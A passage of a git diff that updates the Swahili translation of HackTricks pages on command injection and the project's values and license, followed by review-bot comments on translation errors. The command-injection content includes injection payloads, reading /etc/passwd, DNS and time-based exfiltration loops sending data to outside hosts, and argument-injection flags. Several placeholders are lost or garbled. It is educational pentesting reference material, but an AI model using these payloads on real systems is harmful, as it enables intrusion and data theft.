tumia sanitize_file_name() only for filenames (not full paths) +Hardening +- Hakikisha allowlisted templates; tatua kwa realpath() na require str_starts_with(realpath(file), realpath(allowed_base)) +- Normalize input; kataa traversal sequences na absolute paths; tumia sanitize_file_name() tu kwa filenames (si full paths) -## Marejeo +## Marejeleo - [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/) - [Multiple Critical Vulnerabilities Patched in WP Job Portal Plugin](https://patchstack.com/articles/multiple-critical-vulnerabilities-patched-in-wp-job-portal-plugin/) 
diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 01943e882..0b3de006a 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -4,11 +4,11 @@ ## Je, command Injection ni nini? -A **command injection** inaruhusu utekelezaji wa amri zozote za mfumo wa uendeshaji na mshambuliaji kwenye seva inayoweka application. Kwa matokeo, application na data zake zote zinaweza kuathiriwa/kukomeshwa kabisa. Utekelezaji wa amri hizi kawaida humruhusu mshambuliaji kupata ufikiaji usioidhinishwa au udhibiti wa mazingira ya application na mfumo wa msingi. +A **command injection** inaruhusu utekelezaji wa amri yoyote za operating system na attacker kwenye server inayohifadhi application. Kwa matokeo, application na data yake yote zinaweza kuchukuliwa kabisa. Utekelezaji wa hizi commands kawaida humruhusu attacker kupata ufikiaji usioruhusiwa au udhibiti wa environment ya application na system inayokua chini yake. ### Muktadha -Kutegemea **mahali pembejeo zako zinaingizwa**, huenda ukahitaji **kumaliza muktadha uliomo ndani ya nukuu** (ukitumia `"` au `'`) kabla ya amri. +Kutegemea **mahali ambako input yako inaingizwa** unaweza kuhitaji **kumaliza muktadha uliomo ndani ya nukuu** (kutumia `"` au `'`) kabla ya commands. ## Command Injection/Execution ```bash @@ -30,9 +30,9 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful > /var/www/html/out.txt #Try to redirect the output to a file < /etc/passwd #Try to send some input to the command ``` -### **Kizuizi** Bypasses +### **Limition** Bypasses -Ikiwa unajaribu kutekeleza **amri yoyote ndani ya mashine ya linux** utavutiwa kusoma kuhusu **Bypasses** hizi: +Ikiwa unajaribu kutekeleza **amri yoyote ndani ya mashine ya linux** utapenda kusoma kuhusu **Bypasses:** {{#ref}} 
@@ -47,7 +47,7 @@ vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod ``` ### Vigezo -Hapa kuna vigezo 25 bora vinavyoweza kuwa hatarini kwa code injection na udhaifu za RCE yanayofanana (kutoka [link](https://twitter.com/trbughunters/status/1283133356922884096)): +Hapa kuna vigezo 25 bora vinavyoweza kuwa hatarini kwa code injection na udhaifu mwingine wa RCE (kutoka kwa [link](https://twitter.com/trbughunters/status/1283133356922884096)): ``` ?cmd={payload} ?exec={payload} @@ -75,9 +75,9 @@ Hapa kuna vigezo 25 bora vinavyoweza kuwa hatarini kwa code injection na udhaifu ?run={payload} ?print={payload} ``` -### Utoaji wa data unaotegemea wakati +### Time based data exfiltration -Kutoa data: herufi kwa herufi +Kuchukua data: herufi kwa herufi ``` swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi real 0m5.007s @@ -91,7 +91,7 @@ sys 0m0.000s ``` ### DNS based data exfiltration -Inatokana na zana kutoka `https://github.com/HoLyVieR/dnsbin` pia imehifadhiwa kwenye dnsbin.zhack.ca +Inategemea zana kutoka kwa `https://github.com/HoLyVieR/dnsbin`, pia inapatikana kwenye dnsbin.zhack.ca ``` 1. Go to http://dnsbin.zhack.ca/ 2. Execute a simple 'ls' @@ -101,12 +101,12 @@ for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done ``` $(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il) ``` -Zana za mtandaoni za kuangalia kuondolewa kwa data kwa kutumia DNS: +Zana mtandaoni za kuangalia DNS based data exfiltration: - dnsbin.zhack.ca - pingb.in -### Kupita kando kwa vichujio +### Kuepuka vichujio #### Windows ``` 
@@ -122,7 +122,7 @@ powershell C:**2\n??e*d.*? # notepad ### Node.js `child_process.exec` vs `execFile` -Unapofanya ukaguzi wa back-ends za JavaScript/TypeScript, mara nyingi utakutana na Node.js `child_process` API. +Unapofanya ukaguzi wa back-end za JavaScript/TypeScript, mara nyingi utakutana na Node.js `child_process` API. ```javascript // Vulnerable: user-controlled variables interpolated inside a template string const { exec } = require('child_process'); @@ -130,9 +130,9 @@ exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(pay /* … */ }); ``` -`exec()` huanzisha **shell** (`/bin/sh -c`), kwa hivyo herufi/alama yoyote yenye maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati pembejeo ya mtumiaji inapoambatanishwa ndani ya string. +`exec()` inazindua **shell** (`/bin/sh -c`), hivyo alama yoyote yenye maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati ingizo la mtumiaji linapounganishwa kwenye string. -**Kudhibiti:** tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na utoe **kila argument kama kipengele tofauti cha array** ili hakuna shell ihusishwe: +**Mitigation:** tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na toa **kila argument kama kipengele tofauti cha array** ili hakuna shell ihusike: ```javascript const { execFile } = require('child_process'); execFile('/usr/bin/do-something', [ 
@@ -140,25 +140,25 @@ execFile('/usr/bin/do-something', [ '--payload', JSON.stringify(payload) ]); ``` -Real-world case: *Synology Photos* ≤ 1.7.0-0794 ilikuwa inaweza kutumiwa kupitia tukio la WebSocket lisilotambuliwa ambalo liliweka data iliyodhibitiwa na mshambuliaji ndani ya `id_user` ambayo baadaye iliingizwa katika wito wa `exec()`, ikafanikisha RCE (Pwn2Own Ireland 2024). +Real-world case: *Synology Photos* ≤ 1.7.0-0794 ilitumiwa kupitia tukio la WebSocket lisilo na uthibitisho ambalo liliweka data inayodhibitiwa na mshambuliaji ndani ya `id_user` ambayo baadaye iliingizwa katika wito wa `exec()`, ikiwaleta RCE (Pwn2Own Ireland 2024). -### Uingizaji wa Argument/Option kupitia hyphen ya mwanzoni (argv, no shell metacharacters) +### Argument/Option injection via leading hyphen (argv, no shell metacharacters) -Si uingizaji wote unahitaji shell metacharacters. Ikiwa programu inapitisha nyimbo zisizotegemewa kama hoja kwa utility ya mfumo (hata kwa `execve`/`execFile` na bila shell), programu nyingi bado zitatafsiri hoja yoyote inaanza na `-` au `--` kama chaguo. Hii inampa mshambuliaji nafasi ya kubadili hali, kubadilisha njia za output, au kuanzisha tabia hatari bila hata kuingia kwenye shell. +Sio injection zote zinahitaji meta-herufi za shell. Ikiwa programu inapitisha nadharia zisizotegemewa kama hoja kwa utility ya mfumo (hata kwa kutumia `execve`/`execFile` na bila shell), programu nyingi bado zitatafsiri hoja yoyote inaanza na `-` au `--` kuwa chaguo. Hii inamwezesha mshambuliaji kubadili mode, kubadilisha njia za pato, au kusababisha tabia hatarishi bila hata kuingia kwenye shell. -Maeneo yanayojitokeza kawaida: +Mahali pa kawaida ambapo hili huonekana: -- UI za wavuti zilizojengwa/CGI handlers ambazo hujenga amri kama `ping `, `tcpdump -i -w `, `curl `, etc. -- Router za CGI zilizosimamiwa kwa pamoja (mfano, `/cgi-bin/.cgi` na parameter ya selector kama `topicurl=`) ambapo handlers nyingi zinatumia validator dhaifu ile ile. 
+- Embedded web UIs/CGI handlers zinazojenga amri kama `ping `, `tcpdump -i -w `, `curl `, n.k. +- Centralized CGI routers (mfano, `/cgi-bin/.cgi` na parameter ya selector kama `topicurl=`) ambapo handlers nyingi zinatumia validator dhaifu ile ile. Nini cha kujaribu: -- Toa thamani zinazotangulia na `-`/`--` ili zitumiwe kama flags na zana ya downstream. -- Tumia vibaya flags ambazo hubadilisha tabia au kuandika faili, kwa mfano: -- `ping`: `-f`/`-c 100000` kuumiza kifaa (DoS) -- `curl`: `-o /tmp/x` kuandika njia yoyote, `-K ` kuingiza config inayodhibitiwa na mshambuliaji -- `tcpdump`: `-G 1 -W 1 -z /path/script.sh` kupata utekelezwaji baada ya rotate katika wrappers zisizo salama -- Iki programu inasaidia `--` end-of-options, jaribu kuiepuka mbinu za msingi za kuzuia zinazoweka `--` mahali pasipo sahihi. +- Toa thamani zinazotangulia na `-`/`--` zitakazotumiwa kama flags na chombo kinachofuata. +- Tumia vibaya flags zinazobadilisha tabia au kuandika faili, kwa mfano: +- `ping`: `-f`/`-c 100000` kustresha kifaa (DoS) +- `curl`: `-o /tmp/x` kuandika njia yoyote, `-K ` kupakia config inayodhibitiwa na mshambuliaji +- `tcpdump`: `-G 1 -W 1 -z /path/script.sh` kupata post-rotate execution katika wrappers zisizo salama +- Ikiwa programu inaunga mkono `--` end-of-options, jaribu kuizidi mitigations za kawaida ambazo zinaweka `--` mahali pasipofaa. Generic PoC shapes against centralized CGI dispatchers: ``` @@ -171,7 +171,7 @@ topicurl=¶m=-n # Unauthenticated RCE when a handler concatenates into a shell topicurl=setEasyMeshAgentCfg&agentName=;id; ``` -## Orodha ya Ugundaji ya Brute-Force +## Orodha ya Ugundaji wa Brute-Force {{#ref}} diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md index 4dbc229a9..8925a77b5 100644 --- a/src/welcome/hacktricks-values-and-faq.md +++ b/src/welcome/hacktricks-values-and-faq.md 
@@ -1,21 +1,21 @@ -# Thamani za HackTricks & FAQ +# Maadili ya HackTricks & FAQ {{#include ../banners/hacktricks-training.md}} -## Thamani za HackTricks +## Maadili ya HackTricks > [!TIP] -> Hizi ndio **thamani za Mradi wa HackTricks**: +> Haya ndio **maadili ya Mradi wa HackTricks**: > -> - Toa upatikanaji wa **BILA MALIPO** kwa rasilimali za **elimu za hacking** kwa **mtandao wote**. -> - Hacking ni kuhusu kujifunza, na kujifunza kunapaswa kuwa kwa bure kadri inavyowezekana. -> - Lengo la kitabu hiki ni kuitumikia kama rasilimali ya kina ya **elimu**. -> - **Hifadhi** mbinu za kupendeza za **hacking** ambazo jamii inazichapisha na kuwapa **MAWANDISHI WA ASILI** wote **mikopo**. -> - **Hatuotaki sifa kutoka kwa watu wengine**, tunataka tu kuhifadhi trick nzuri kwa kila mtu. -> - Pia tunaandika **tafiti zetu** kwenye HackTricks. -> - Katika kesi kadhaa tutaandika tu **katika HackTricks muhtasari wa sehemu muhimu** za mbinu na tuta**hamasisha msomaji atembelee chapisho la asili** kwa maelezo zaidi. -> - **PANGA** mbinu zote za **hacking** kwenye kitabu ili ziwe **RAHISI KUPATIKANA ZAIDI** -> - Timu ya HackTricks imejitolea maelfu ya masaa bila malipo **tu kupanga maudhui** ili watu waweze **kujifunza kwa haraka** +> - Toa **UPATAKAJI WA BURE** wa rasilimali za **hacking za KITAALUMA** kwa **INTANETI YOTE**. +> - Hacking ni kuhusu kujifunza, na kujifunza kunapaswa kuwa bure kadri iwezekanavyo. +> - Madhumuni ya kitabu hiki ni kuhudumia kama **chanzo kamili cha kielimu**. +> - **HIFADHI** mbinu za kushangaza za **hacking** ambazo jamii inazochapisha ikiwapa **WAANDISHI WA ASILI** sifa zote. +> - **Hatutaki sifa za watu wengine**, tunataka tu kuhifadhi mbinu nzuri kwa kila mtu. +> - Pia tunaandika **tafiti zetu** katika HackTricks. +> - Katika visa kadhaa tutataja tu **muhtasari wa sehemu muhimu** za mbinu katika HackTricks na tutamweka **msomaji atembee kwenye chapisho la asili** kwa maelezo zaidi. 
+> - **PANGA** mbinu zote za **hacking** katika kitabu ili ziwe **RAHI KUPATIKANA** +> - Timu ya HackTricks imejitolea maelfu ya saa bure **kwa ajili tu ya kupanga yaliyomo** ili watu wajifunze kwa haraka zaidi
@@ -23,35 +23,35 @@ > [!TIP] > -> - **Asante sana kwa rasilimali hizi, ninawezaje kuwashukuru?** +> - **Asante sana kwa rasilimali hizi, naweza kuwashukuru vipi?** -Unaweza kumshukuru kwa umma timu za HackTricks kwa kuandaa rasilimali hizi zote kwa kuchapisha tweet ukimtaja [**@hacktricks_live**](https://twitter.com/hacktricks_live).\ -Ikiwa umewashukuru sana unaweza pia [**kufadhili mradi hapa**](https://github.com/sponsors/carlospolop).\ -Na usisahau **kuweka nyota kwenye miradi ya Github!** (Tafuta viungo hapa chini). +Unaweza kuwashukuru hadharani timu ya HackTricks kwa kupanga rasilimali hizi kwa kuchapisha tweet ukimtaja [**@hacktricks_live**](https://twitter.com/hacktricks_live).\ +Ikiwa una shukrani za kipekee unaweza pia [**kufadhili mradi hapa**](https://github.com/sponsors/carlospolop).\ +Na usisahau **kutoa nyota kwenye miradi ya Github!** (Angalia viungo hapo chini). > [!TIP] > -> - **Ninawezaje kuchangia mradi?** +> - **Ninaweza kuchangia mradi vipi?** -Unaweza **share new tips and tricks with the community or fix bugs** unazopata katika vitabu kwa kutuma **Pull Request** kwa kurasa husika za Github: +Unaweza **kushiriki vidokezo vipya na mbinu na jamii au kurekebisha bugs** unazopata katika vitabu kwa kutuma **Pull Request** kwa kurasa husika za Github: -- https://github.com/carlospolop/hacktricks -- https://github.com/carlospolop/hacktricks-cloud +- [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks) +- [https://github.com/carlospolop/hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud) -Usisahau **kuweka nyota kwenye miradi ya Github!** +Usisahau **kutoa nyota kwenye miradi ya Github!** > [!TIP] > -> - **Naweza kunakili baadhi ya maudhui kutoka HackTricks na kuyaweka kwenye blogu yangu?** +> - **Je, ninaweza kunakili baadhi ya yaliyomo kutoka HackTricks na kuyaweka kwenye blogu yangu?** -Ndiyo, unaweza, lakini **usisahau kutaja kiungo/viungo maalum** ambavyo maudhui yalichukuliwa kutoka. 
+Ndiyo, unaweza, lakini **usisahau kutaja kiungo maalum ambapo yaliyomo yalichukuliwa**. > [!TIP] > -> - **Ninawezaje kurejea ukurasa wa HackTricks?** +> - **Ninawezaje kurejelea ukurasa wa HackTricks?** -Mradi tu kiungo **cha** ukurasa(au kurasa) ulizotumia taarifa kutoka kinaonekana inatosha.\ -Ukihitaji bibtex unaweza kutumia kitu kama: +Iwapo kiungo cha ukurasa(au kurasa) ambako ulipata taarifa kinaonekana basi hiyo inatosha.\ +Ikiwa unahitaji bibtex unaweza kutumia kitu kama: ```latex @misc{hacktricks-bibtexing, author = {"HackTricks Team" or the Authors name of the specific page/trick}, 
@@ -62,82 +62,82 @@ url = {\url{https://book.hacktricks.wiki/specific-page}}, ``` > [!WARNING] > -> - **Naweza kunakili HackTricks zote kwenye blogi yangu?** +> - **Je, ninaweza kunakili HackTricks yote kwenye blogu yangu?** -**Ningependelea si.** Hiyo **haitamfaidi mtu yeyote** kwa sababu **maudhui yote tayari yamo hadharani** katika vitabu rasmi vya HackTricks kwa **bure**. +**Napendelea sio hivyo**. Hii **haitamfaa mtu yeyote** kwa kuwa yaliyomo yote tayari **yapo hadharani** katika vitabu rasmi vya **HackTricks** kwa **bure**. -Ikiwa una hofu kwamba yatafifia, fanya tu fork kwenye Github au jipakue; kama nilivyosema tayari ni bure. +Ikiwa unaogopa kwamba yatafifia, fanya fork kwenye Github au uyapakue; kama nilivyosema, tayari ni bure. > [!WARNING] > -> - **Kwa nini mna sponsors? Je, vitabu vya HackTricks vimetengenezwa kwa madhumuni ya kibiashara?** +> - **Kwa nini mna wafadhili? Je, vitabu vya HackTricks vimeundwa kwa madhumuni ya kibiashara?** -Thamani ya kwanza ya **HackTricks** ni kutoa rasilimali za elimu ya **hacking** ZA **BURE** kwa **WOTE** duniani. Timu ya HackTricks imejitolea maelfu ya saa kutoa maudhui haya, tena, kwa **BURE**. +Thamani ya kwanza ya **HackTricks** ni kutoa rasilimali za kielimu za hacking kwa **BURE** kwa **WOTE** ulimwenguni. Timu ya **HackTricks** imeweka **maelfu ya masaa** kutoa yaliyomo haya, tena, kwa **BURE**. -Ikiwa unafikiri vitabu vya HackTricks vimetengenezwa kwa **madhumuni ya kibiashara** uko **KOSA KABISA**. +Ikiwa unadhani vitabu vya **HackTricks** vimetengenezwa kwa **madhumuni ya kibiashara** uko **UMEKOSEA KABISA**. -Tuna sponsors kwa sababu, hata kama maudhui yote ni ZA **BURE**, tunataka kutoa jamii uwezekano wa kuthamini kazi yetu ikiwa wanaona inafaa. 
Kwa hiyo, tunawapa watu chaguo la kuchangia HackTricks kupitia [**Github sponsors**](https://github.com/sponsors/carlospolop), na kampuni zinazohusiana na cybersecurity kushirikiana na HackTricks na kuweka baadhi ya matangazo katika kitabu, huku matangazo hayo yakiwa yamewekwa sehemu zinazoonekana lakini **hazivurugi** mchakato wa kujifunza ikiwa mtu anazingatia maudhui. +Tuna wafadhili kwa sababu, hata kama yaliyomo yote ni **BURE**, tunataka **kuwaruhusu watu jumuiya kutendea kazi yetu shukrani** ikiwa watataka. Kwa hivyo, tunawawezesha watu kuchangia HackTricks kupitia [**Github sponsors**](https://github.com/sponsors/carlospolop), na kampuni zinazohusiana na usalama wa mtandao kuchangia HackTricks na **kuwa na matangazo** kwenye kitabu, ambapo **matangazo** hayo hupangwa mahali yanayoonekana lakini **hayavurugi mchakato wa kujifunza** ikiwa mtu anazingatia yaliyomo. -Hautapokea HackTricks ikiwa imejazwa na matangazo yanayekera kama blogi nyingine zenye maudhui kidogo kuliko HackTricks, kwa sababu HackTricks haijatengenezwa kwa madhumuni ya kibiashara. +Hautapata HackTricks imejaa matangazo yanayokasirisha kama blogu zingine zenye yaliyomo kidogo zaidi kuliko HackTricks, kwa sababu HackTricks haijatengenezwa kwa madhumuni ya kibiashara. > [!CAUTION] > -> - **Nifanye nini ikiwa ukurasa wa HackTricks umejengwa kwa msingi wa chapisho langu la blogi lakini haujatajwa chanzo?** +> - **Nifanye nini ikiwa ukurasa fulani wa HackTricks umejengwa kwa kutumia chapisho langu la blogu lakini haujatajwa?** -**Tunasikitika sana. Hii haipaswi kutokea.** Tafadhali tujulishe kupitia Github issues, Twitter, Discord... kiungo cha ukurasa wa HackTricks wenye maudhui na kiungo cha blogi yako na **tutakagua na kuiongeza ASAP**. +**Tunasikitika sana. Hii haipaswi kuwa imekutokea.** Tafadhali tujulishe kupitia Github issues, Twitter, Discord... kiungo cha ukurasa wa HackTricks chenye yaliyomo na kiungo cha blogu yako na **tutakagua na kuiweka HARAKA IWEZAYO**. 
> [!CAUTION] > -> - **Nifanye nini ikiwa kuna maudhui kutoka blogi yangu kwenye HackTricks na sitaki yawepo hapo?** +> - **Nifanye nini ikiwa kuna yaliyomo kutoka kwenye blogu yangu katika HackTricks na sitaki yawepo hapo?** -Kumbuka kwamba kuwa na viungo kwenye ukurasa wako katika HackTricks: +Kumbuka kuwa kuwa na viungo vya ukurasa wako ndani ya HackTricks: -- Huboresha **SEO** yako -- Maudhui yanapata **kutafsiriwa katika lugha zaidi ya 15** na hivyo kuwawezesha watu wengi zaidi kuyapata -- **HackTricks inahimiza** watu **kuangalia ukurasa wako** (watu kadhaa wametujulisha kwamba tangu ukurasa wao uanze kuwepo katika HackTricks wamepata ziara nyingi zaidi) +- Kuboresha **SEO** yako +- Yaliyomo yanatafsiriwa hadi **lugha zaidi ya 15**, hivyo kuwezesha watu wengi zaidi kupata yaliyomo haya +- **HackTricks inahimiza** watu **kukagua ukurasa wako** (watu kadhaa wamesema tangu kurasa zao ziwepo HackTricks wamepata ziara zaidi) -Hata hivyo, ikiwa bado unataka maudhui ya blogi yako yatoweke, tujulishe na bila shaka **tutaondoa kila kiungo kwa blogi yako**, na maudhui yoyote yaliyojengwa kutokana nayo. +Hata hivyo, ikiwa bado unataka yaliyomo ya blogu yako yaondolewe kutoka HackTricks, tujulishe tu na tutafuta dhamana ya **kuondoa kila kiungo cha blogu yako**, na yoyote yaliyomo yanayotokana nayo. > [!CAUTION] > -> - **Nifanye nini nikigundua maudhui yaliyopakuliwa (copy-pasted) kwenye HackTricks?** +> - **Nifanye nini nikigundua yaliyomo yaliyonakiliwa (copy-pasted) katika HackTricks?** -Daima **tunamtoa mwandishi wa asili sifa zote**. Ikiwa unapata ukurasa wenye maudhui yaliyopakuliwa bila chanzo cha asili kurejelewa, tujulishe na sisi tutafanya mojawapo ya yafuatayo: **tutaiondoa**, **tutaongeza kiungo kabla ya maandishi**, au **tutairekebisha kwa kuiongeza kiungo**. +Daima tunatoa **sifa zote kwa waandishi wa asili**. 
Ikiwa utapata ukurasa ulio na yaliyomo yaliyonakiliwa bila marejeo ya chanzo asilia, tujulishe na tutafanya mojawapo ya yafuatayo: **kuondoa**, **kuongeza kiungo kabla ya maandishi**, au **kuandika upya tukiongeza kiungo**. -## LESENI +## LICENSE Hakimiliki © Haki zote zimehifadhiwa isipokuwa ilivyoainishwa vinginevyo. #### Muhtasari wa Leseni: -- Utambulisho: Una uhuru wa: -- Kushiriki — kunakili na kusambaza tena nyenzo kwa njia yoyote au umbizo wowote. -- Kurekebisha — kuchanganya upya, kubadilisha, na kujenga juu ya nyenzo. +- Attribution: Una uhuru wa: +- Share — nakili na usambaze tena nyenzo kwa njia yoyote au muundo wowote. +- Adapt — remix, badilisha, na ujengwa juu ya nyenzo. #### Masharti ya Ziada: -- Yaliyomo ya Wahusika Wengine: Sehemu kadhaa za blogi/kitabu hiki zinaweza kujumuisha maudhui kutoka vyanzo vingine, kama vipande kutoka blogi nyingine au machapisho. Matumizi ya maudhui kama haya yanafanywa chini ya kanuni za fair use au kwa idhini ya wazi kutoka kwa wamiliki wa hakimiliki husika. Tafadhali rejea vyanzo vya asili kwa taarifa maalum za leseni kuhusu maudhui ya wahusika wengine. -- Uandishi: Maudhui ya awali yaliyotungwa na HackTricks yamo chini ya masharti ya leseni hii. Unahimizwa kumtaja mwandishi wakati wa kushiriki au kurekebisha kazi hii. +- Maudhui ya Watu wa tatu: Sehemu kadhaa za blogu/kitabu hiki zinaweza kujumuisha maudhui kutoka vyanzo vingine, kama vifupi kutoka blogu au machapisho mengine. Matumizi ya maudhui kama hayo hufanywa kwa misingi ya matumizi ya haki au kwa ruhusa maalum kutoka kwa wamiliki wa hakimiliki. Tafadhali rejea vyanzo vya asili kwa taarifa maalum za leseni zinazohusu maudhui ya watu wa tatu. +- Uandishi: Yaliyomo ya asili yaliyoandikwa na HackTricks yamo chini ya masharti ya leseni hii. Unahimizwa kumtaja mwandishi unaposhiriki au kubadilisha kazi hii. #### Msamaha: -- Matumizi ya Kibiashara: Kwa maswali kuhusu matumizi ya kibiashara ya maudhui haya, tafadhali wasiliana nami. 
+- Matumizi ya kibiashara: Kwa maswali kuhusu matumizi ya kibiashara ya yaliyomo haya, tafadhali wasiliana nami. -Leseni hii hawaitoi haki yoyote ya alama za biashara au haki za chapa kuhusiana na maudhui. Alama zote za biashara na chapa zilizotajwa katika blogi/kitabu hiki ni mali ya wamiliki wao mtawaliwa. +Leseni hii haisomi kama inakupa haki za alama za biashara au umuhimu wa chapa kuhusiana na yaliyomo. Alama zote za biashara na chapa zilizotajwa katika blogu/kitabu hiki ni mali ya wamiliki wao husika. -**Kwa kuingia au kutumia HackTricks, unakubali kufuata masharti ya leseni hii. Ikiwa hukubaliani na masharti haya, tafadhali, usiingie kwenye tovuti hii.** +**Kwa kufikia au kutumia HackTricks, unakubali kuzingatia masharti ya leseni hii. Ikiwa hukubaliani na masharti haya, tafadhali usifanyi matumizi ya tovuti hii.** -## **KIDOKEZO CHA KUTOHUSIKA** +## **Disclaimer** > [!CAUTION] -> Kitabu hiki, 'HackTricks,' kimetengenezwa kwa madhumuni ya elimu na taarifa tu. Maudhui ndani ya kitabu hiki yanatolewa kwa hali ya "kama yalivyo", na waandishi na wachapishaji hawatoa uwakilishi wala dhamana ya aina yoyote, iwe bayana au iliyotamkwa, kuhusu ukamilifu, usahihi, uimara, uwajibikaji, ubora, au upatikana wa taarifa, bidhaa, huduma, au michoro inayohusiana iliyomo katika kitabu hiki. Kila tegemezi unaloweka kwenye taarifa hizo ni kwa hatari yako wewe mwenyewe. +> Kitabu hiki, 'HackTricks,' kimekusudiwa kwa madhumuni ya elimu na taarifa tu. Yaliyomo ndani ya kitabu hiki yanatolewa kwa msingi wa 'kama ilivyo', na waandishi na wachapishaji hawatoi uwakilishi wala dhamana ya aina yoyote, kwa wazi au kwa kauli, kuhusu ukamilifu, usahihi, uaminifu, ufaa, au upatikanaji wa habari, bidhaa, huduma, au michoro inayohusiana katika kitabu hiki. Kila utegemezi utakaoamuriwa juu ya habari hizo upo kwa hatari yako mwenyewe. 
> -> Waandishi na wachapishaji hawatakuwa chini ya hatima yeyote walau ya hasara au uharibifu wowote, ikiwa ni pamoja na, bila kikomo, hasara za moja kwa moja au za matokeo, au hasara yoyote ile inayotokana na upotevu wa data au faida zinazotokana na, au kuhusiana na, matumizi ya kitabu hiki. +> Waandishi na wachapishaji hawatajibu kwa hasara yoyote au uharibifu wowote, ikiwemo bila kikomo, hasara isiyo ya moja kwa moja au uharibifu wa matokeo, au hasara yoyote ile iliyosababishwa na upotevu wa data au faida inayotokana na, au kwa kuhusiana na, matumizi ya kitabu hiki. > -> Zaidi ya hayo, mbinu na vidokezo vilivyoripotiwa katika kitabu hiki vinatolewa kwa madhumuni ya elimu na taarifa tu, na havipaswi kutumika kwa shughuli zozote haramu au zenye madhara. Waandishi na wachapishaji hawakubali wala kuunga mkono shughuli zozote haramu au zisizo za kimaadili, na matumizi yoyote ya taarifa zinazomo katika kitabu hiki ni kwa hatari na uamuzi wa mtumiaji. +> Aidha, mbinu na vidokezo vilivyoelezwa katika kitabu hiki vinatolewa kwa madhumuni ya elimu na taarifa tu, na haviwezi kutumika kwa shughuli haramu au za uharibifu. Waandishi na wachapishaji hawapendelei wala kuunga mkono vitendo vyovyote haramu au visivyo vya maadili, na matumizi yoyote ya habari zilizo ndani ya kitabu hiki ni kwa hatari na uamuzi wa mtumiaji. > -> Mtumiaji ndiye mwenye jukumu kamili kwa vitendo vyovyote anavyochukua kwa msingi wa taarifa zilizomo ndani ya kitabu hiki, na anapaswa kila wakati kutafuta ushauri wa kitaalamu na msaada wakati anajaribu kutekeleza mbinu au vidokezo vilivyotajwa hapa. +> Mtumiaji ndiye mwenye jukumu kikamilifu kwa hatua zozote zitakazochukuliwa kutokana na habari zilizo katika kitabu hiki, na anapaswa kila wakati kutafuta ushauri na msaada wa mtaalamu anapojaribu kutekeleza mbinu au vidokezo vilivyoelezwa hapa. 
> -> Kwa kutumia kitabu hiki, mtumiaji anakubali kumwachilia waandishi na wachapishaji kutoka kwa uzito wowote wa dhamana na uwajibikaji kwa uharibifu, hasara, au madhara yanayoweza kutokea kutokana na matumizi ya kitabu hiki au taarifa zilizomo ndani yake. +> Kwa kutumia kitabu hiki, mtumiaji anakubali kumtolea waandishi na wachapishaji dhamana na wajibu wowote kwa hasara, uharibifu, au madhara yatakayoweza kutokana na matumizi ya kitabu hiki au habari yoyote iliyomo ndani yake. {{#include ../banners/hacktricks-training.md}}
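Review bot: The translation direction flips inside the install_and_activate hunk: the "Detection checklist" and "Hardening" bullets are changed from Swahili to English ("-- REST/AJAX handlers zinazobadilisha plugins/themes ..." becomes "+- REST/AJAX handlers that modify plugins/themes ..."), while the neighbouring lines ("+PoC (muundo unategemea plugin; mfano tu)", the new depicter heading) are being translated into Swahili. Keep the bullets in Swahili so the section reads in one language. Separately, the PoC route `https://victim.tld/wp-json//plugin/install_and_activate` has an empty path segment where the REST namespace belongs; put a placeholder there so readers can see what the double slash stands for.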
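Review bot: Heading translations are inconsistent between the two sections of hunk @@ -812,38: the Depicter section renames "Detection checklist"/"Hardening" to "Orodha ya ugunduzi"/"Kuimarisha", while the Kubio section directly below does the reverse and replaces "Orodha ya utambuzi"/"Uimarishaji" with the English "Detection checklist"/"Hardening". Settle on a single pair of Swahili headings and apply it to both sections (and to the earlier sections of the file, which still use the English pair).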
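Review bot: In hunk @@ -4,11 the new line "+A **command injection** inaruhusu utekelezaji wa amri yoyote za operating system" loses the number agreement the removed line had: "amri yoyote za" should be "amri zozote za" (plural "zozote" to match "za"). The stray English article "A" in front of "**command injection**" should also go; "**Command injection** inaruhusu ..." reads naturally.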
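Review bot: "+### **Limition** Bypasses" in hunk @@ -30,9 introduces a misspelling. The removed "**Kizuizi** Bypasses" was correct Swahili; either keep "Kizuizi" or, if the heading is meant to stay English, write "**Limitation** Bypasses".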
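Review bot: In hunk @@ -140,25 the sentence "+... Ikiwa programu inapitisha nadharia zisizotegemewa kama hoja kwa utility ya mfumo" mistranslates "untrusted strings": "nadharia" means theories (and the removed "nyimbo" meant songs). Leave "strings" untranslated, as this hunk already does for "shell", "flags" and "metacharacters", e.g. "inapitisha strings zisizotegemewa kama hoja". In the same hunk the command templates in "+- Embedded web UIs/CGI handlers zinazojenga amri kama `ping `, `tcpdump -i -w `, `curl `", the route "`/cgi-bin/.cgi`" and the flag "`-K `" have lost their placeholder tokens on both sides of the diff; restore explicit placeholders so the reader can tell where the user-supplied value is inserted.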
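Review bot: The context line "topicurl=¶m=-n" in the PoC block of hunk @@ -171,7 has had "&param" collapsed into the pilcrow "¶m" (the "&para" prefix was decoded as an HTML entity), so the example no longer shows a valid query string. It should read as a handler placeholder followed by "&param=-n", matching the intact "+topicurl=setEasyMeshAgentCfg&agentName=;id;" line two lines below it.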
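Review bot: "+> - **PANGA** mbinu zote za **hacking** katika kitabu ili ziwe **RAHI KUPATIKANA**" in hunk @@ -1,21 drops a syllable; the removed line had "RAHISI KUPATIKANA ZAIDI", so the new line should read "**RAHISI KUPATIKANA**".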
